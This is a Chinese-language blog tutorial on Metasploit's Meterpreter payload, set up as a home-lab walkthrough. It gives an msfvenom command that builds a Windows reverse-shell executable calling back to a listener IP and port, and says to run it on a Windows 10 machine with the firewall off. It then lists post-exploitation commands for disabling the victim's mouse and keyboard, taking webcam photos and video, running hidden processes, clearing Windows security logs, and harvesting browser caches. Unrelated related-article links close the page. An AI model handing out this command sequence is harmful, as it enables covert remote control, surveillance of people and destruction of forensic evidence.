Meterpreter
Meterpreter是Metasploit框架中的一個擴充套件模組,作為溢位成功以後的攻擊載荷使用,攻擊載荷在溢位攻擊成功以後給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個Meterpreter shell的連結。Meterpreter shell作為滲透模組有很多有用的功能,比如新增一個使用者、隱藏一些東西、開啟shell、得到使用者密碼、上傳下載遠端主機的檔案、執行cmd.exe、捕捉螢幕、得到遠端控制權、捕獲按鍵資訊、清除應用程式、顯示遠端主機的系統資訊、顯示遠端機器的網路介面和IP地址等資訊。
檢視kali和window的ip
在kali終端ifconfig,ip是192.168.0.103
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=5555 -f exe -o met.exe
生成met.exe可執行的exe,並點選執行。
複製到win10主機,需要關閉window的防火牆
exploit命令發起攻擊
在window桌面不小心放在重要的檔案,直接cat查詢
補充下,msfconsole的一些命令,只有控制了window,下面的命令都可以執行。
# 讓他不能用滑鼠uictl開關鍵盤/滑鼠uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/滑鼠uictl disable mouse #禁用滑鼠uictl disable keyboard #禁用鍵盤 # 如果開了攝像頭拍照webcam攝像頭命令webcam_list #檢視攝像頭webcam_snap #通過攝像頭拍照webcam_stream #通過攝像頭開啟視訊execute執行檔案execute #在目標機中執行檔案execute -H -i -f cmd.exe # 建立新程序cmd.exe,-H不可見,-i互動# clearav清除日誌clearav #清除windows中的應用程式日誌、系統日誌、安全日誌# 基本網路命令ipconfig/ifconfignetstat –anoarpgetproxy #檢視代理資訊route #檢視路由# 資訊收集的指令碼位於:/usr/share/metasploit-framework/modules/post/windows/gather/usr/share/metasploit-framework/modules/post/linux/gather# 資訊收集的指令碼較多,僅列幾個常用的:run post/windows/gather/checkvm #是否虛擬機器run post/linux/gather/checkvm #是否虛擬機器run post/windows/gather/forensics/enum_drives #檢視分割槽run post/windows/gather/enum_applications #獲取安裝軟體資訊run post/windows/gather/dumplinks #獲取最近的檔案操作run post/windows/gather/enum_ie #獲取IE快取run post/windows/gather/enum_chrome #獲取Chrome快取run post/windows/gather/enum_patches #補丁資訊run post/windows/gather/enum_domain #查詢域控其實很弄別人是不行的,別人怎麼會傻傻的關防火牆。
延伸閱讀
- 好用到飛起!微軟復活超強Windows工具集,網友:做得好
- 微軟即將“放棄”這部分使用者!網友潸然淚下,但我很支援
- 微軟即將停止對win7的支援,那麼我們到時候會受影響麼?
- 全球第一系統易主?任正非突然宣佈!沉默已久的中興也忍不住了
- 推出10年後裝機量才被Win10超越 生命力強大的win7還能用麼?
- Windows7停更倒記時,微軟已發出最後通牒,但這類使用者不受限制
- win7系統進入退役倒計時!微軟或將開啟藍屏警告,你準備好了嗎?
- 世界第一系統將“暴斃”?美科技界炸鍋:中方或將彎道超車
- Win 7死亡前慘遭微軟補刀,升級Win 10洗白突然免費
- 最新Linux 除了能夠偽裝成Win 10,還能讓手機變桌上電腦?